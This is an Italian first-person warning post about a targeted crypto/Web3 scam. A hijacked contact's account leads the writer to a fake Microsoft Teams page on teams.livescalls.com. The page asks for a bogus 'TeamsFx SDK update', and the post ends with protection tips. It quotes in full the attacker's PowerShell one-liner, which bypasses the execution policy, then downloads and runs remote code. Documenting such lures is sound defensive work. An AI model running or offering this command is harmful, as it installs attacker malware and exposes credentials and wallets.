Vorrei raccontarvi come sono arrivato a un passo dal diventare vittima di un elaborato schema di ingegneria sociale ideato per sfruttare qualcosa di così ordinario e apparentemente innocuo come una chiamata di Microsoft Teams avvenuta oggi.
Per la maggior parte dell'interazione, nulla sembrava fuori dall'ordinario.
Qualcuno che pensavo fosse un contatto del settore mi ha contattato per organizzare un incontro su Microsoft Teams e il collaboratore disponibile che è in me è stato più che felice di rispondere alla chiamata.
Attenzione spoiler: la persona dall'altra parte era un imitatore e ha cercato di farmi eseguire un codice dannoso sul mio computer.
Racconto qui l'intera esperienza per avvisare amici, conoscenti e contemporanei della comunità crittografica e Web3.
Oggi ero quasi io; domani potrebbe essere qualcun altro.
Fase 1: La preparazione — "Ci sentiamo, vecchio amico"
Quando ricevi un messaggio dall'account Telegram di qualcuno che conosci come un dipendente di alto livello di una nota agenzia di pubbliche relazioni specializzata in criptovalute, l'ultima cosa che ti passa per la mente è che stai venendo risucchiato in un tentativo di phishing.
Nessuno dei tipici segnali d'allarme è apparso immediatamente evidente.
Non si è trattato di un DM casuale.
Non stavo parlando di un account di un imitatore in cui la "i" è sottilmente sostituita da una "l".
In realtà avevo anche una cronologia delle chat con quell'account, quindi pensavo di avere la persona reale dall'altra parte.
Nulla sembrava fuori posto da quando hanno iniziato una conversazione del tutto amichevole per riallacciare i rapporti. In poco tempo, un link Calendly per prenotare una riunione di 30 minuti e un invito a una chiamata su Microsoft Teams.
Come ho detto prima, il mio radar non ha mai smesso di funzionare durante l'interazione. Ho percepito lo stesso livello di professionalità e pazienza che ci si aspetterebbe da un membro di alto livello di un'agenzia di pubbliche relazioni di alto livello.
Tutto quello che sapevo era che avevo programmato una riunione Teams dalla pagina Calendly di un contatto del settore.
Il truffatore avvia il contatto utilizzando un account hackerato, inviando un link alla riunione di Teams.
Fase 2: La trappola "Partecipa solo sul desktop"
Arrivò il giorno della riunione e cliccai sul link della riunione di Teams sul mio telefono, come avevo fatto almeno mille volte in passato. Tuttavia, non fui reindirizzato direttamente alla riunione come al solito. Invece di essere reindirizzato alla chiamata, si aprì una schermata che diceva "L'accesso a questa riunione tramite dispositivi mobili non è consentito a causa delle impostazioni dell'organizzatore".
"Oh-oh! Non mi era mai successo prima."
Beh, non è stato un caso.
Col senno di poi, quello è stato probabilmente il primo vero campanello d'allarme.
La schermata di errore fa parte del design. I truffatori hanno bisogno di te su un computer desktop o portatile perché il loro payload dannoso è uno script da riga di comando che funziona solo su PC.
L'URL nel browser " teams.livescalls.com" NON è il vero dominio Microsoft.
Le riunioni di Teams legittime utilizzano teams.microsoft.com o teams.live.com.
Da lontano il dominio "livescalls.com" sembra abbastanza simile alla realtà, ma se lo si guarda attentamente, è davvero molto lontano dalla realtà.
Uno è il sito controllato da Microsoft che vanta oltre 320 milioni di utenti attivi al giorno. L'altro è un sito completamente falso, controllato dagli aggressori.
A dire il vero, alcune organizzazioni potrebbero utilizzare domini personalizzati per le riunioni di gruppo. Tuttavia, oltre 1.000 miliardi di dollari di fondi persi a causa di truffatori nel 2025, secondo il World Economic Forum, sono stati motivo sufficiente per non ignorare il mio intuito.
La falsa pagina "Team Access Notice" blocca l'accesso da dispositivi mobili, costringendo le vittime a utilizzare un computer desktop su cui lo script dannoso può essere eseguito. Notare l'URL: teams.livescalls.com, non un dominio Microsoft.
Dopo il blocco dei dispositivi mobili, il truffatore fa pressione sulla vittima affinché si iscriva tramite desktop, affermando che "i partner stanno aspettando".
Passaggio 3: Il payload: "Aggiorna il tuo TeamsFx SDK"
Una volta sul desktop, la falsa riunione di Teams mostrava una pagina progettata professionalmente, simile a quella che si troverebbe nella documentazione ufficiale Microsoft. Includeva persino il testo originale di Microsoft, secondo cui l'SDK di TeamsFx sarebbe stato deprecato entro settembre 2025.
La soluzione? Copiare un blocco di codice ed eseguirlo nel terminale o nel prompt dei comandi.
Se fai un ulteriore tentativo di ricerca su Google, scoprirai che esiste un SDK simile. Semplicemente non ti serve per questa chiamata di team.
A prima vista, il codice sembra innocuo: imposta variabili d'ambiente con nomi ufficiali come TeamsFx_API_KEY e MS_Teams_API_SECRET. Ma il vero vettore di attacco si trova da qualche parte nel mezzo, e questi aggressori non contano sul fatto che tu riesca a individuare il problema:
powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”
Questa singola riga ignora i criteri di sicurezza di PowerShell (-ep bypass), scarica il codice dal server dell'aggressore e lo esegue immediatamente (iex = Invoke-Expression).
E in un attimo, qualsiasi malware, keylogger o strumento di accesso remoto ospitato dagli aggressori viene installato silenziosamente sul tuo dispositivo.
L'interfaccia falsa della riunione di Teams mostra la pagina dannosa "Aggiornamento SDK TeamsFx" presentata ai partecipanti. Notare i partecipanti alla chiamata: video generati dall'intelligenza artificiale.
Fase 4: La fase di pressione "Non preoccuparti, è sicuro"
Quando ho espresso la mia esitazione nell'eseguire lo script, l'impostore mi ha subito rassicurato e pressato.
La frase "Non preoccuparti, è molto semplice e sicuro per te" avrebbe dovuto aiutarmi a seguire le istruzioni nello screenshot che mi mostrava come aprire il Prompt dei comandi sul mio PC.
"I partner si sono già uniti su Zoom" avrebbe dovuto farmi sentire la pressione di non dover far cambiare piattaforma a tutti perché non riuscivo a capire come eseguire un semplice prompt dei comandi.
Non mi sono sentito rassicurato. Non mi sono sentito nemmeno sotto pressione.
Quando ho proposto di spostare la chiamata su Google Meet, hanno rifiutato. A quanto pare, la loro truffa funziona solo tramite la loro finta configurazione di Teams.
Il truffatore invia istruzioni dettagliate per eseguire il codice dannoso, rassicurando la vittima: "Non preoccuparti, è molto semplice e sicuro per te".
Fase 5: Bluff chiamato — Bloccato ed eliminato
Ho confermato i miei sospetti dopo aver controllato lo script e il dominio: ero vittima di ingegneria sociale e stavo per entrare a far parte delle statistiche del World Economic Forum del 2026.
Ho detto direttamente al truffatore: "Ho appena controllato e questo comando e il sito web non sono legittimi. Purtroppo non potrò farlo". Mi sono offerto di continuare la conversazione su Google Meet se avessero voluto ancora chattare.
"Ma la riunione è in corso ora", era il messaggio dall'altra parte.
Come previsto, la loro risposta mirava a farmi capire l'urgenza di partecipare alla chiamata. Dopotutto, non vorrei far aspettare tutti quei partner troppo a lungo.
Pochi istanti dopo, hanno cancellato tutta la nostra corrispondenza e mi hanno bloccato.
Ah… Non è solo un campanello d'allarme. Parliamo di sfumature di cremisi.
I contatti aziendali non cancellano l'intera cronologia delle conversazioni e non ti bloccano nel momento in cui metti in dubbio un aggiornamento software.
Dopo che la truffa è stata denunciata, l'aggressore insiste sul fatto che la riunione è "in corso" prima di eliminare tutti i messaggi e bloccare la vittima.
Come proteggersi
Questo tipo di attacco è in forte crescita nei settori delle criptovalute, del Web3 e della tecnologia. I truffatori compromettono o impersonano account reali appartenenti a professionisti delle pubbliche relazioni, investitori e responsabili di progetto per prendere di mira individui di alto valore. Ecco come proteggersi:
- Non eseguire mai comandi da una pagina di riunione. Nessuna piattaforma di videochiamata legittima ti chiederà mai di incollare codice nel terminale o nel prompt dei comandi.
- Controlla l'URL. Le vere riunioni di Microsoft Teams sono in diretta su teams.microsoft.com o teams.live.com, non su "teams.livescalls.com" o altri domini simili.
- Diffidate dei requisiti "solo desktop". Se una riunione blocca l'accesso tramite dispositivi mobili, si tratta di una tattica deliberata per farvi accedere a un computer su cui è possibile eseguire script.
- Verifica la persona tramite un canale separato. Se un contatto noto ti invia un link insolito per una riunione, chiamalo direttamente o inviagli un messaggio su una piattaforma diversa per confermare.
- Fai attenzione a "powershell -ep bypass" e "iex". Sono i due principali campanelli d'allarme in qualsiasi script. Il primo disabilita la sicurezza, il secondo esegue il codice scaricato alla cieca.
- Se hai già eseguito lo script: disconnettiti immediatamente da Internet. Esegui una scansione completa anti-malware (Malwarebytes, Windows Defender Offline). Cambia tutte le password da un dispositivo diverso e pulito. Monitora i portafogli di criptovalute e i conti bancari per verificare la presenza di transazioni non autorizzate.
Perché questo è importante per Crypto e Web3
Non definirei questa una tipica interazione di phishing, in cui gli aggressori lanciano reti ampie e vedono cosa ci tirano dentro.
No, si è trattato di un'operazione di ingegneria sociale mirata, durata diversi giorni. Gli aggressori si sono travestiti da contemporanei del settore per giorni, instaurando un rapporto e organizzandosi per guidarti casualmente nella risoluzione di un problema tecnico durante una chiamata Teams tramite una convincente pagina Microsoft falsa.
Che rubino le tue credenziali, prosciughino il tuo portafoglio crittografico o installino malware persistente per l'accesso remoto, gli aggressori hanno tutto da guadagnare e niente da perdere.
Se sei un fondatore, un investitore o chiunque partecipi a riunioni nel settore delle criptovalute e della tecnologia, condividi questo articolo con il tuo team. Le persone che gestiscono queste truffe stanno migliorando e l'unica difesa è la consapevolezza.